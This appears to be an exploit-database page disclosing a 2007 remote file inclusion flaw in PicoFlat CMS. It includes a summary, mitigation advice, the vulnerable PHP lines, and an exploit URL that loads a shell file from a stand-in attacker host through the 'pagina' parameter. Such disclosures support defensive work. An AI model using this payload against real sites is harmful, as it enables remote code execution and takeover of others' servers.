header-logo
Suggest Exploit
vendor:
PicoFlat CMS
by:
0in
5.5
CVSS
MEDIUM
Remote file inclusion
CWE
Product Name: PicoFlat CMS
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PicoFlat CMS Remote file inclusion

This exploit allows an attacker to include a remote file in the index.php page of PicoFlat CMS. By manipulating the 'pagina' parameter in the URL, an attacker can include a malicious file hosted on a remote server. This can lead to remote code execution and further compromise of the system.

Mitigation:

To mitigate this vulnerability, it is recommended to update PicoFlat CMS to the latest version, which may include a patch for this issue. Additionally, it is advised to properly sanitize and validate user inputs to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

#PicoFlat CMS Remote file inclusion
#f0und bY 0in
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro
#Others: Joker186,Kaja,Wojto111,Rade0n
#And funny n00b-firends: Pucik and Steryd ;]
FUN BUG in index.php:
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }

107:   <?php  include $pagina; ?>

EXPLOIT:
http://x.com/index.php?pagina=http://evil.org/shell.txt?

# milw0rm.com [2007-10-11]

Navigation

Suggest Exploit

Services By CQR